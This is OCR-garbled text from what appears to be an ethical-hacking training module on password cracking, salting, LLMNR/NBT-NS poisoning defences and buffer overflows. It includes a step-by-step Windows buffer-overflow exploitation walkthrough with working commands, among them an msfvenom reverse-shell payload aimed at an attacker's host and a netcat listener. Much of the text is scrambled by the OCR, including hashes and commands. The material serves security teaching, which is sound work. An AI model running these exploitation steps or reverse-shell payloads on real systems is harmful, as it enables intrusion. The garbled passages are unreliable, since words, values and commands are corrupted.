andquickly crackthe in the rainbow
the password
to crack
attackersuse RainbowCrack hashes
of the targetsystem.
hantoncrce
srosetoe
6aesarb73es947e0c089c0
arasetoe
6aesa1b73eS947e0c089c0
Administrator
Guest
69os31673e5967e0c089c0
rosewood
AscasroisnsisstesidesT2ss0o4et
Defoutdecount
FA
<notound> stout Adin
PA 17070665
sepe7aa07daseetaetia2eode87e
rinesra479
apple
2dr02S2a47ONSSedGeI7EIGESbL—gwesty
Main
dato
2
Messoges
esr
oevso4se0837o2a82807973000537
west ES
Plait
of
2025204
RGEC
Query GSIBESDe
‘ome
disk
alam of
of
hain
hash&rede
averse:
ead
clelaton 1510400,
of
umber
Derlomance afehanaver:
155343,
280mlions
ical andCountermensores
Mackin ©by E-Comel
Copyright
PasswordSalting
salting
\@ Password isa technique
wherea randomstring
ofcharacters
are added
to the
beforecalculating
password the hashes
Alicerootbsef21
6051
iGad303c024a85176080701380) =~
sobirootadedta:3282abd0208323eF0340de7292e34030 ferent hs
$485
ecittoot:209be1 303739134761de075e0387ae08)~
PasswordSalting
salting
Password is a technique
i n whichrandomstrings
of characters
are addedto a password
beforecalculating
the hashes.
Thismakesi t more difficultto thehashes andhelps
reverse in
defeating
pre-computedhashattacks.Thelonger
the randomstring,the harderit becomesto
breakor crackthe password.
The randomstringof characters
shouldbe a combination of
alphanumericcharacters,
In cryptography, consistsof randomdata bitsusedas an inputto a one-way function,
a “salt―
the otherbeinga password. Insteadof passwords,
of
the output the one-wayfunction
storedand usedto authenticateusers. A saltcombineswith a password
functionto generatea keyfor use with a cipher or othercryptographic
algorithm.
can be
bya keyderivation
This
technique differenthashesfor the same password,
generates whichrenderspassword
cracking
difficult.
Alice:root:baef21 Sbad303ce24a83Te0317608de020I38d
password Same but
Cecil:root:209be
1
aitorent
rashes
due
Bob:root:a9c4fa:3282abd0308323¢f0349dc7232c349ac
Citerent
salts
4835303¢23af34761de02be038ide08)
4
to
of password
Example
Figure6.27: salting
Note: Windowspassword
hashes
a re not salted,
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
PasswordCracking
Usean securty
information auditto monitorandtrack password
attacks
sallow use
&
ofthesame pasword during
password
change
Disallowthe use
a ndprotocols
protocls
found detonary
with weak
encryption
toringpasswords
‘void nan unsecured location
defautpasswords
Oonot use anysystem
Ensure thatapplications
netherstorepasswords
i n memorynor weit
Usea random
string befor
a) 352 preficorsffitothepassword eneryption
Disallowtheuse
Monitortheserver's
of
of pasword
suchadate birth,s pouse
chi,
6
Module Got
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
1
How to Defendagainst
PasswordCracking
(Cont'd) CEH
EE.ete stem 08 passwort partir
protected on devices
tht ae suscep tops tess
employees
reused thwart
sel
‘Tain
tate dumpster
to socalengineering suchas
cedentils
shoulder surfing
and diving, which
Perform
password hen
screening new ae createdtoavoidusing
passwords usedpasswords
commonly
Use
two
or fr to
provent
factor mit factorauthentiaton example
usingCAPTCHA automated
attacks
Secure
physi
access
an contol to ofline passwordattacks
to prevent
systems
accessible
only
databasesare
Ensuethatthe password a nd
enerpted to administrators
system
Maskthe
of
passwords
dplay
onthe
to screen avoidshoulder attacks
surfing
=
Enableinformationsecurity
Donot usethe same
audit to
password
monitor
during change.
andtrackpassword
the password
attacks.
*
passwords.
Donotshare
=
Donot use passwords
that can befoundi n a dictionary.
Donot use cleartextprotocols
or protocols
with weakencryption.
change
Set thepassword policy
to 30 days.
storingpasswords
‘Avoid location.
i n an unsecured
ical andCountermensores
Mackin ©by E-Comel
Copyright
for eachindividual, for attackersto construct tableswith a single
it is impractical
encrypted
EnableSYSKEY
password.
version of eachcandidate
with a strongpassword
UNIXsystems
to encryptand protect
typically
use a 12-bitset.
Check application
any suspicious that stores passwords in memoryor writes them to
disk.
Unpatched
systems
can reset passwords
during
buffer overflow or denial-of-service
attacks.Makesure to update
the system.
Examine
whether
failedlogin
multiple the
accountis i n use,deleted,
attemptsare detected.
or disabled.
Disablethe user account if
physical
to suchas servers andlaptops.
threats,
to thwart socialengineeringtactics,suchas shouldersurfing
Train employees and
dumpsterdiving,
Configure
whichare usedto steal
password
policies
user
Policy
underthe Group
credentials.
objecti n the Windows OS.
Perform
password whennew passwords
screening are createdto avoidusingcommonly
usedpasswords.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usetwo-factoror multi-factor for example,
authentication, use CAPTCHA
to prevent
automatedattackson criticalinformationsystems.
Secureandcontrolphysical
access to to preventoffline password
systems attacks
Ensure password databasefiles are encrypted onlyby system
and accessible
administrators.
Maskthe display
of passwords
onscreen to avoidshoulder-surfing
attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
LLMNR/NBT-NS
Poisoning
Disabling
LMBNR Disabling
NBENS
rete ton
the Local
Open Policy
Group Editor.
Navigate Computer
to Local ->Computer
Policy > Administrative
Configuration
> Network>
Templates DNSClient.
In theDNSClient,
double-click
Turnoffmulticast
name resolution.
Selectthe Enabled
radiobuttonandthenclickOK.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Disabling
NBT-NS
Figure6.28:
in
LMBNRWindows
Disabling
Open
andclickon the
Center, to and
theControlPanel,navigate Network Internet > NetworkandSharing
Change
adapter optiono n the right-hand
settings side.
Right-click
on the networkadapterandthenclickProperties, selectTCP/IPv4,
and
thenclickProperties.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Advanced Settings
TCP/IP
SettingsDNs WINS
WS adresses,order
of
we:
da,
TOPAD
enable
u nsosTs
is Itapples
FUPOSTSloan enabled
e enables
eokun
to for al conection which
InportLMHOSTS..
Net8105
seting
Defauts
Use
' Net
setting
fom
tnsblethe
OHCP
server
nt
NetBlOS
used
or theDHCP
if
sever does provide
over TDP.
NetSIOS
settng,
Enable
NetBIOS
over TCPAP
DabNe Pi]
Figure
629:Disabling
NBT-NS
in Windows
6
Module 60?
Page tical andCountermensores
Making Copyright©
by Comet
Toolsto DetectLLMNR/NBT-NS
Poisoning
‘Vina ap
LLM
NANSONSSpoon
Tools to DetectLLMNR/NBT-NSPoisoning
Networkadministratorsand cybersecurity
professionals
use tools such as Vindicate,
got-
responded,
andRespounder to detectLLMNR/NBT-NS
poisoningattacks.
=
Vindicate
Source:https://github.com
Vindicate is an LLMNR/NBNS/mDNS
spoofing
detection toolkit for network
administrators. professionals
Security usethistool to detectn ame service spoofing,
This
tool helps
themto quickly
detectandisolateattackerso n their network.It is designed
to
detecttheuse of hacking
toolssuchas Responder, Inveigh, NBNSpoof, andMetasploit’s
LLMNR, NBNS, and mDNSspoofers while avoiding false positives. It exploits
the
Windowsevent logfor quick withan ActiveDirectory
integration network.
Modul
6 608
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Ethical a n Countermeasures
aching {am 21250Cetied tcl Hacer
SytemHacking
Windows
PowerShell
it -
\Users dein Desktop\VindicateTog!-master\ReleaseBinarie:
Copyrsght(C) DannyHout
Wo
‘ndicate 2017
trih ABSOLUTELY
ARRAN
Ace (Onlyone usage of eachsocket addr
abiing. Port 5359 tn use of snsuffictent prsvi ten
nn? 1020-20
"adjusted f0 Lows
ctive WPAO service at 10.10.40-34, claiming Responder
Confidencelevel adjusted
to Certain
on 8 TCP port at 10,40-30-11
service
‘from ciavaing10.10.10.12
£0.410,40.14
ai 10-10.10:12clavmingResponder
ervice WPAD
response
©From 30.10:10:42claiming10-10-10-11
‘rom
10.
forto.t0.41 clavming
8 20.10. 40.3
Re: respon
st 10:10:
got-responded
Figure6.30
Screenshot the
showing
output ofVindicate
Source:https://github.com
got-responded helps professionals
security spoofing.
to checkfor LLMNR/NBT-NS This
tool starts in the defaultmodeandchecksforbothLLMINRand NBT-NSspoofing
but
doesnot sendfakeSMBcredentials.
Modul
6 608
Page ical Mackin
and ©
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
ubuntu@ubuntu:-/gotresponded
Mo\tn
now
started
Respounder
Figure6.31
Screenshot
of
theoutput gotresponded
showing
Source:https://github.com
Respounder detectsthe presenceof a responder
i n the network.Security
professionals
usethistool to identify
compromised machines
beforehackers exploit
password
hashes.
Thistool also helps to detectroguehostsrunningresponder
professionals
security on
ubuntuevbuntu:-/respounder
632:Screenshot
Figure outputof Respounder
showing
6
Module 610
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Vulnerability
Exploitation
remote Thesteps
system. Involved
ae a follows:
dontiythevulnerability
Determinethe riskassodated
withthevlneabilty
Determinethecapabilitywneraity
ofthe
theexploit
Develop
Select
the method
fr delivering
loca or remote
Cainremoteaccess
Vulnerability
Exploitation
Vulnerability
exploitation
involvesthe execution of multiple
complex,
interrelatedstepsto gain
access to a remote system.Attackers c an performexploitation
onlyafter discovering
vulnerabilitiesin that targetsystem. vulnerabilitiesto develop
Attackersuse discovered exploits
anddeliverandexecute the exploits on the remote system.
Steps vulnerabilities:
involvedin exploiting
1.
the
Identify Vulnerability
Attackersidentify the vulnerabilitiesthat exist i n the targetsystemusing various
techniques discussedi n the previousmodules. Thesetechniques includefootprinting
and reconnaissance, scanning,enumeration,andvulnerability analysis.
After identifying
the OSsusedandvulnerableservices runningo n the targetsystem, attackersalsouse
various online exploit
sites suchas ExploitDatabase (https://www.exploit-db.com)
and
SecurityFocus (https://waw.securityfocus.com)
to detectvulnerabilitiesi n underlying
OS
andapplications.
with the Vulnerability
Determine the RiskAssociated
identifying
After a vulnerability,
attackersdeterminethe risk associatedwith the
vulnerability,
‘e.,whetherexploitation
of this vulnerability
sustains the security
measures
on
the
target
system.
Determinethe Capability
of the Vulnerability
If theriskis low,attackers thecapability
can determine
gain remote access to the targetsystem,
of
exploiting
vulnerability
this to
ical andCountermensores
Mackin ©by E-Comel
Copyright
4.
Develop
theExploit
After determiningthe capability attackersuse exploitsfromonline
of the vulnerability,
exploit Exploit
sites suchas Database(https://www.exploit-db.com),
or develop their
.
‘own
using
exploits exploitation toolssuchasMetasploit.
Selectthe Methodfor Delivering
Localor Remote
~
Attackersperform
remote exploitationover a network to exploit
vulnerability existing
in
theremote systemto gainshellaccess.If attackers
haveprior accessto thesystem, they
perform to escalateprivileges
localexploitation or execute applicationsi n the target
system.
- GenerateandDeliverthe Payload
Attackers,
as partof exploitation,
generate or selectmalicious payloads
using toolssuch
anddeliver it to the remote systemeitherusingsocialengineeringor
as Metasploit
through
a network.Attackersinjectmalicious shellcodei n the payloads,
which,when
establishes
executed, a remote shellto thetargetsystem.
. GainRemoteAccess
the payload,
After generating attackersrun the exploitto gainremote shella ccessto the
target Now,attackerscan run various maliciouscommands
system. on the remote shell
andcontrolthe system,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Sites
Exploit
Sites
Exploit
‘Attackers
can use various exploit
sites suchas Exploit
Database,
SecurityFocus,
etc. to discover
vulnerabilities
anddownload or develop exploitsto perform remote exploitation
on the target
Thesesites includedetailsof the latestvulnerabilitiesandexploits.
system.
Exploit
Database
Source:https://www.exploit-db.com
Exploit
Databaseincludes
detailsof the latest vulnerabilities
presenti n various OSs,
devices,
applications, etc. Attackers can search ExploitDatabaseto discover
vulnerabilities
i n that targetsystem,download the exploitsfromthedatabase,
anduse
exploitation
toolssuchas Metasploit to gain remote access.
ical andCountermensores
Mackin ©by E-Comel
Copyright
633:Screenshot
Figute of Exploit
Database
SecurityFocus
Source:https://www.securityfocus.com
SecurityFocus
contains a databaseof the recentlyreportedcybersecurity incidentsand
software
bugs,alongwith a searchablearchiveofcommon vulnerabilities andexposures
(CVEs).
Attackerscan searchSecurityFocus to detectvulnerabilitiesi n the targetOSand
applications.
< seu
Symantec
Connect
ts
facis―
6:34:Screnshot
Figure ofSecurityFocus
06
Module tt
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
vulpB,
Source:https://vuldb.com
VulD8includesdetailsof the latestvulnerabilitiesand exploits,
rated basedon the
highest exploitation probability.
Attackers can searchthe VulDBto identify
vulnerabilitiesandexploit
themor even fullyautomate the exploitation,
MITRECVE
635:
Figure Secenshot of vuD8
Source:https://eve.mitre.org
MITREmaintains a CVEdatabasethat contains detailsof the latestvulnerabilities.
Attackers
c an searchMITRE CVEto discover
vulnerabilities
that exist i n the target
system.
SearchResults
Figure6:36:
Serenshot of
ical
MITRECVE
andCountermensores
Mackin ©by E-Comel
Copyright
1
BufferOverflow CEH
“a.
arememory
locations
Abuter san
toa to handle
|@Bute oerfiw or overun
theaoestedbutter
its
runtime
8
data
of adjacent
common
allocated program
vulnerability
i n an applations
oapplaton
thataccepts
or programs moredts than
exceed
neighboring
memory Buller
locations data
to
©.Thisvulnerability
the
butfer
allowsthe application
to the whe wtng andoverwrite
exploit
‘tackers
damage
buteroverfiow to injectm alicious
vulnerability codeintothebute to files,moafy
‘Why
Programs
Applications
Buffer
Overflow?
Are and Vulnerablete
of
Jang
and semen
oder versionsprowamming
u nsafe winerable
Using
argues
fonetons
© wean
© Improper
memory
inthe tack
adepresent
aocaton
BufferOverflow
A buffer is a n area of adjacent
memory locationsallocatedto a program or application
to
handleits runtime data.Bufferoverflowor overrun is acommon vulnerability i n applications
or
progyramsthat acceptm ore data than the allocatedbuffer. This vulnerability allowsthe
appliication to exceed the buffer whilewritingdata to the bufferand overwrite neighboring
memorylocations.Furthermore, this vulnerability
leadsto erratic systembehavior, system
crash, memoryaccess errors, etc. Attackersexploit a buffer overflowvulnerability
to inject
maliciouscode into the buffer to damage files,modifyprogram data,access critical
escalateprivileges,
inforr‘mation, gainshellaccess,andso on,
Why‘Are Programs andApplications Vulnerableto Buffer Overflows?
Boundary
checksa re not performed fully,or, i n most cases,entirely
skipped
Applications
that use olderversions of programming languagesinvolveseveral
vulnerabilities
Programs
that use unsafeandvulnerablefunctionsfail to validatethebuffersize
andapplications
Programs that donot adhere to goodprogramming practices
Programmersthatfail to set properfiltering
andvalidationprinciples
i n the applications
Systems
that execute code presentin the stacksegment are vulnerable to buffer
overflows
Improper
memoryallocationandinsufficientinputsanitizationin the application
leadto
buffer
overflow
Application
attacks
for accessingheap
programs that use pointers memory resulti n buffer
overflows
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
ofBufferOverflow:Stack-Based
Types BufferOverflow
CEH
1 arestateand in
(©.
Astackisw edfor aloation
memory storesthevariables “Latin
Fist.out―
(UFO)
oder
|
a
stats
(©When
>
function executionastackre is ESP
(Extended Ponte)Stack
Stack Frame
Fetum
adress
stored
onthe pace E Pregister utr
thetatof
over,
butler thenattackers
tae contreofthe
[Pregetertoreplae etn addres he £0― BasePointer)
functionwah themals code lowsthem (Extended
cress tothetreet stm
toapinshel Instruction
[P(Etended > Return
Pointer) Adress
of BufferOverflow:Stack-BasedBufferOverflow
Types
(Cont’a) CEH
4
6
Module 617
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
ofBufferOverflow:Heap-Based
Types BufferOverflow
\@ Heap
memory
allocated
at
runtime
during
the
exscuton
program
dynamically
program of he anit stores
when
a occurs
Heap:basedovertiow blocko f memoryisallocated
to heap,anddat is writen without any
‘Ths
vulnerability
tableete headers,
leads
to overwiting
heapbased
_xtackersexlot
object
dynamic heap
pointers,
bufferovertowto takecontrol
heap-baseddatatual
oftheprogramsexeston. Unikestack
overtows,
funtion
of BufferOverflow
‘Types
Thereare two typesof buffer overflow,namely buffer overflowand heap-
the stack-based
basedbufferoverflow.
=
Stack-Based BufferOverflow
In most applications,
a stackis usedfor static memoryallocation,Contiguous blocksof
memoryare allocatedfor a stackto store temporary variablescreatedbya function.
Thestackstores thevariablesin “Last-in (LIFO)
First-out― order.Whenevera functionis
called,
the required
operations,namely, PUSH,
for
memory storingthe variablesis declaredon the stack,
the function returns,the memoryis automatically
andwhen
deallocated.Thereare two stack
whichstores data onto the stack, and POP,whichremoves
datafromthestack.
Stackmemoryincludesfive typesof registers:
© EBP: ExtendedBasePointer(EBP), alsoknownas StackBase,
stores the addressof
the firstdataelementstoredonto the stack
ESP:ExtendedStackPointer(ESP) of the next dataelementto be
stores the address
storedonto thestack
InstructionPointer(EIP)
EIP: Extended stores theaddress
ofthe next instruction to
beexecuted
ESI:ExtendedSourceIndex (ESI)
maintains the source index for various string
operations
maintains the destinationindex forvarious
EDI:ExtendedDestinationIndex (EDI)
stringoperations
ical andCountermensores
Mackin ©by E-Comel
Copyright
AAstack-basedbufferoverflowoccurs whenan applicationwrites more data to a buffer
than what is actuallyallocatedfor that buffer. To understandstack-basedbuffer
you must focuson the EBP,
overflow, EIP,andESPregisters.EIPis the most important
read-onlyregister,which stores the addressof the instruction that needsto be
subsequently
executed.
ButferSpace
IP (Extended
Pointer)
BP (Extended
Base
instruction
Pointer) > RetumAddress
Whenever
Figure
of
6.7: Representation
tack
function attacker
NormalStack
‘A StackwhenAttacker
cals 3 stackwhen overfiows
‘ute
in function
to smashthestack
Figure638:
Demonstrationofstackbased
b er overtiow
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Heap-Based BufferOverflow
Aheap I s usedfor dynamic memoryallocation,Heap memoryis dynamically allocatedat
run
time
heap
heap
duringof the execution the program,andit
memoryis slowerthanaccessing
memoryis not performed
storesthe programdata. Accessing
stackmemory.Theallocationanddeallocationof
automatically.
Programmers must write codefor the
allocation{malloc()] of heap memory,and after the execution is complete, theymust
deallocatethe memoryusingfunctionssuchas free()
Heap-based overflowoccurs whena blockof memory is allocatedto a heapanddatais
written without any bound checking. Thisvulnerabilityleadsto overwriting links to
dynamic memoryallocation(dynamic object
pointers),heap headers,heap-based data,
virtualfunctiontables, etc. Attackersexploit
heap-based bufferoverflowto takecontrol
of program’s
the
execution.
commonly
Bufferoverflowsheap occur in the memoryspace,andexploitation
ofthese
bugs is differentfromthat of stack-based
bufferoverflows.Heapoverflowshavebeen
prominently discovereda s softwaresecurity bugs.Unlike stack overflows,
heap
overflowsare inconsistentandhavevaryingexploitationtechniques.
buffer
Faure6 39;Demonstrationof heap-bosed overflow
ical andCountermensores
Mackin ©by E-Comel
Copyright
BufferOverflowin
Simple C
BufferOverflow in
Simple C
The examples showni n the screenshots and heap-based
demonstratestack-based buffer
overflow:
Figure640:
Screenshot
C demonstrating
of program stack-based
butter
overflow
Modul
Page
6 624
tical
Making
and by CountermensoresCopyright©
Comet
641:
Figute Sereenshot theoutputofstackb ased
showing bute overtow
Figure of Cprogram
642:Serenshot demonstrating bulferoverflow
heap-base
Screenshot
Figure643:
of buffer
overflow
the output heap-based
showing
ical
Mackin
and Copyright
©
by Countermensores E-Comel
WindowsBufferOverflowExploitation CEH
Steps
involvedin exploiting
Windowshaxedbuffer overflowvulnerability:
vero
BD
Byrevo
ine Ed.
eeriy
nd tracers
ting ena
the
et mode
Identify
the
offset Gonerate
shelicode
vert te pr
sonrote
Modul
6 622
Page tical andCountermensores
Making Copyright©
by Comet
WindowsBufferOverflowExploitation
(Cont'd) CEH
to
crash
‘uzaing
equied the targetsever
‘This
In injecting
in the
information
helps determining exact
reise, whichfurtherhelps
malicious
shelled
6
Module 624
Page tical andCountermensores
Making Copyright©
by Comet
WindowsBufferOverflowExploitation
(Cont'd) CEH
act
the
satacers ue the Metasploit
ramework
locationwhere EI cegister ie bengoverwtiten are to offset
rubytools identitythe and
Modul
6 625
Page tical andCountermensores
Making Copyright©
by Comet
WindowsBufferOverflowExploitation
(Cont'd) CEH
GE),
Modul
6 626
Page tical andCountermensores
Making Copyright©
by Comet
WindowsBufferOverflowExploitation
(Cont'd) CEH
Before
injecting
theshelode
stacker identity
thatmaycause
thebadehars
Characters
such
te, ie,
badchare
06
Modul 627
Page tical andCountermensores
Making Copyright©
by Comet
WindowsBufferOverflowExploitation
(Cont'd)
Tdenlfythe RightModule
06
Modul 628
Page ti l andCountermeasures
Macking
©
Copyightby E-Comell
WindowsBufferOverflowExploitation
(Cont'd) CEH
WindowsBufferOverflow Exploitation
Exploiting
Windows-based involvesthe following
bufferoverflowvulnerability steps
Perform spiking
=
Performfuzzing
=
Identify
the offset
OverwritetheEIPregister
Identify
badcharacters
Identify
the rightmodule
+
Generate shelleode
Gain root access
Beforeexecuting steps,you must installand run a vulnerableserver on the
the following
victim’s Debugger,
machine,then run Immunity
debugger.
andfinally attachthe vulnerableserver the
to
PerformSpiking
Spikingallowsattackersto sendcraftedTCPor UDPpackets to the vulnerableserver to makeit
crash.
It
following helps
attackers vulnerabilities
application
to identifybufferoverflow
stepsare involvedi n spiking:
i n thetarget The
Step
‘+
-1: Establish
server
a connection with the vulnerable
<Target Port>
@parrot
#nc 10.10.10.19 9999
-nv
iON [gmon ]
6006 [gdog_value]
STET [kstet value]
ER [gter_value]
Figure644:Sereenshot
ofNetca
ical andCountermensores
Mackin ©by E-Comel
Copyright
Step2:Generatespike
-
Â¥ 4v
PlainText TabWidth:
Figure
Now,sendthe packages
645:Screenshot STATS
showing spike
template
to thevulnerableserver usingthe following
command
generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR
SKIPSTR
Topo To OTe SD
Screenshot
Figure646:
of vulnerable
the output spiking
showing
ical
server
andCountermensores
Mackin ©by E-Comel
Copyright
‘As
6.47: Figure Screenshot Debugger
of immunity
functionis not vulnerableto buffer overflow,
we haveidentifiedthat the STATS we
trunsp
earch Tools Document
DB open v
*
B trunspk
x
readlin
PlainText v_TabWidth:
4¥ —__Ln3,Col24
Now,sendthe packages
Figure
TRUN
showing spiketemplate
648:Screenshot
to thevulnerableserver using the following
command
<Target
generic_send_tep IP> <Target Port> spike_script SKIPVAR
SKIPSTR
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘As
shownin
Screenshot
Figure649:
the screenshot,
of vulnerable
server
theoutput spiking
showing
the TRUNfunctionof the vulnerableserver hasbuffer
overflowvulnerability.
Spiking thisfunctionoverwrites stackregisters suchas EAX, ESP,
EBP, theycan gain shellaccess to the
andEIP.If attackerscan overwrite the EIPregister,
targetsystem,
Debugger
650: Screenshotof immunity
Figure showing vulnerabilty
bufer overfiow
ical andCountermensores
Mackin ©by E-Comel
Copyright
Perform
Fuzzing
After identifying
the bufferoverflowvulnerability in the targetserver,we must perform fuzzing.
Attackersuse fuzzingto send a largeamount of datato the target server so that it experiences
bufferoverflowandoverwrites the EIPregister, Fuzzing helps in identifyingthenumberof bytes
requiredto crashthe targetserver. Thisinformationhelps i n determining the exact locationof
whichfurtherhelps
the EIPregister, maliciousshellcode.
in injecting
For example,
the screenshotbelow showsthe sample
Python
scriptusedby attackersto
perform
fuzzing:
gure
buffmultiplies
Whenyou execute theabovecode,
showing
Screenshot
651: Python
seit for faring
for everyiteration of thewhileloopand
sendsthe
buff
datato thevulnerableserver. Asshownin the screenshots,
crashedafterreceivingapproximately
register.
thevulnerableserver
2300 bytesof data,but it did not overwrite the EIP
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
652:Screenshot Debugger
of immunity showing
vulnerable
server before
bufferoverflow
6 showing
Figure53:Sereenshot
of
theoutput fuzzing
vulnerable
server
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify
theOffset
Throughfuzzing,
we haveunderstoodthat we can overwrite the EIPregisterwith 1 to 2300
bytes
of data.Now,we will use the following
pattern_createRuby tool to generaterandom
bytes
of data:
/usr/share/netasploit-framework/tools/exploit/pattern_create.rb
By
3000
655:
Figure Screenshot
showing
Metasploit
patterncreateoutput
ical andCountermensores
Mackin ©by E-Comel
Copyright
Run
the follllowing bytes
scriptto sendtheserandom
Python to thevulnerable
server:
657;
Figure Screenshotof immunity showing
Debugger vulnerable
server
after
thebufferoverfiow
ical andCountermensores
Mackin ©by E-Comel
Copyright
Runthefollowing to findthe exactoffsetof therandombytes
command in theEIPregister:
/usz/share/netasploit-framework/tools/exploit/pattern_offset.rb
3000 386F4337
-1
-q
Figure
68 showing
Screenshot pattern_offet
Metasploit output
Overwritethe EIPRegister
showni n the
‘As screenshot,
we haveidentifiedthat the EIPregister
is at an offsetof 2003,
bytes.
Now,run the following
Python
to wecontrol
script check whether can the EIPregister.
659:
Figure Sereenshoof Pthon scrip
necting
in
the
EIP
shellcode register
ical andCountermensores
Mackin ©by E-Comel
Copyright
{Asshowni n the screenshot,
the EIPregister
can be controlledand overwritten with malicious
shellcode.
Identify
BadCharacters
Beforeinjecting you must first identify
the shellcodeinto the EIPregister, badcharacters
that
may cause issues in the shellcode. You can obtain the badcharsthrough a Google
search.
Characterssuchas no byte,Le.,“\x00―,
are badchars.
badehars
x1
-
\
\xb5\xb6
4
\xb7
\xbs
\xcb9
\xba
\xhb
\xbe
\xbd \xb2
\xa0 \xal \xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\\xab\xac\xad\xae\xaf\xb0\xb1
xb3\xb \xbe\xbE―
x05xed edb \xef\xd0\xd1
\xd2
"\xc0\xet \xe2\xe3\ \xe5\xc6\xc7\xe8\xe9\xca\xcb\xce\xed\xce
\ xd3 \xed \ \ xd \ ed \ xe \ xd
\ ed6\ 7 \ xd \ 9 \ eda\
\xe2\xe3\xe4\x05\xo6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\x£2
*\xe0\xe1
ical andCountermensores
Mackin ©by E-Comel
Copyright
InImmunityDebugger,
661: Screenshotof Python
Figure
on
the
seit
right-click ESPregistervalue,
for
sending
badchas,
in
thenclickon “Follow Dump,―
and
finally Youwill find that thereare n o badcharsthat create problems
observethe characters. in
theshellcode.
ical andCountermensores
Mackin ©by E-Comel
Copyright
modules.You must downloadmona.py fromGitHuband copy it to the pathImmunity
Debugger > PyCommands. Now,run the vulnerableserver andthe ImmunityDebuggeras.
andattachthe vulnerable
Administrator, server to the debugger.
In Immunity
Debugger,type !mona modules i n the bar at the bottomof the window.As
a pop-upwindowis created,
showni n the screenshot, whichshowsthe protection
settingsof
variousmodules.
Figure663:Screenshot
shown i n the screenshot,
‘As
Debugger
of Immunity
showing
one of the modules,
mona modules
essfunc.dll,
lacksmemory protection.
Attackersexploitsuchmodules to injectshelicodeandtakefull controlof theEIPregister.
Now,
run the followingnasm_she11 Ruby scriptto convert assembly language (IMPESP)into hex
code:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
Next,i n ImmunityDebugger,
664:
Figure Screenshot
showing
typethe following
nasm_shell
Metasploit output
commandi n the bar at the bottomof the
windowto determine the return addressof thevulnerablemodule:
tmona find ~s \xff\xed― -m essfunc.d11
ical andCountermensores
Mackin ©by E-Comel
Copyright
InImmunity
665: Screenshoto f immunity
Figure
Debugger,select“Enter
expression
showing
Debugger
enter
return addressof
For
as
example,
if the return addressis “625011a£",
then you
the x86 architecturestores valuesi n the Little Endianformat. must send“\xaf\x11\x50\x62",
6
Modul 642
Page ti l andCountermeasures
Macking
©
Copyightby E-Comell
667:
Figure Screenshot
of Python
seit fr overwitingE P
Whenyou run the abovescript,you will notice that the EIPregister
hasbeenoverwritten with
the return addressof thevulnerablemodule:
Figure668Screenshot
shownin the screenshot,
‘As
of Immunity
Debugger
showing
attackerscan controlthe EIP register
EIPregister
if the targetserver has
thatdo not havepropermemoryprotection
‘modules settings.
ical andCountermensores
Mackin ©by E-Comel
Copyright
GenerateShellcode
andGainShellAccess
Now,
run the following
msfvenom
command the shellcode:
to generate
msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port>
EXITFUNC=thread -f c -a x86 -b “\x00―
-p > payload,
In the abovecommand, > attacker'sIP,LPORT
LHOST > attacker'sport,-f >
-a
filetype,> architecture,
and-b > badcharacters
669: Screenshotshowing
Figure
af
theoutput msfvenom
ical andCountermensores
Mackin ©by E-Comel
Copyright
Now,run thefollowing Python shellcode
scriptto injectthe generated into theEIPregister
and
gain shellaccess to the target
vulnerableserver:
Before
runningtheabovescript,
670:
Figure Screenshotof Python
following
run the
serit fr
Netcatcommand
EP
overwriting
to listenon port4444:
ne
-nvip 4444
gure 6.7:ScreenshotofNetat
ical andCountermensores
Mackin ©by E-Comel
Copyright
Next,run the abovePython
scriptto gainshella ccessto thetargetvulnerable
server:
re 6.72:Screenshotof
Netcat
remote
showing shellaccess
Figure showing
6:73:Screensht remoteaccess to Admin
account
Modul
6 646
Page tical andCountermensores
Making Copyright©
by Comet
BufferOverflowDetectionTools
‘llyOb tracesstack frames
dynamically andprogramexecution,and erncade
BufferOverflow DetectionTools
Variousbuffer overflow detectiontools that helpsecurity
professionals
to detect buffer
overflowvulnerabilities
are discussed
below:
=
ollyDbg
Source:http://www.ollydbg.de
OllyDbg analyzing
is a 32-bit assembler-level debugger for Microsoft®
Windows".Its
emphasis on binary codeanalysis makesit particularly usefulwhen the source is
unavailable.It debugs multithreadapplications
and attachesto running programs. It
recognizescomplex code constructs,such as a call to jump to the procedure. It
dynamicallytracesstackframesandprogram execution, andit logsargumentsof known
functions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ofOlyobg,
6.74:Screenshot
Figure
Someadditionalbufferoverflow
detection
toolsare as follows:
=
(https://www.veracode.com)
Veracode
+
Flawfinder(httpsi//dwheeler.com)
=
Kiuwan (https://www.kiuwan.com)
Splint
(https://github.com)
BOVSTT(https://github.com)
Module
Page 6 648
tical
Making
and
Countermenso
CopyrightÂ
by Comet
againstBufferOverflows
Defending
Defending BufferOverflows
against
Thefollowing
countermeasurescan beadopted
to defendagainst
bufferoverflowattacks:
+
Develop
programsbyfollowing
secure coding andguidelines
practices
spacelayout
‘Usetheaddress (ASLR)
randomization whichrandomly
technique, moves
aroundtheaddressspacelocationsof thedataregion
Validateargumentsandminimize codethat requires root privileges
levelusingstatic anddynamic
Performcodereview at the source-code codeanalyzers,
Allowthecompiler
to addbounds
to allthe buffers
Implement
automatic boundchecking
Always
protectthe return pointero n the stack
patch
of
Never allowexecution code outsidethecodespace
Regularly applications
andoperating
systems
Perform manually
codeinspection witha checklist
to ensure thatthe codemeetscertain
criteria
Employ stacks,
non-executable ie., dataexecution prevention
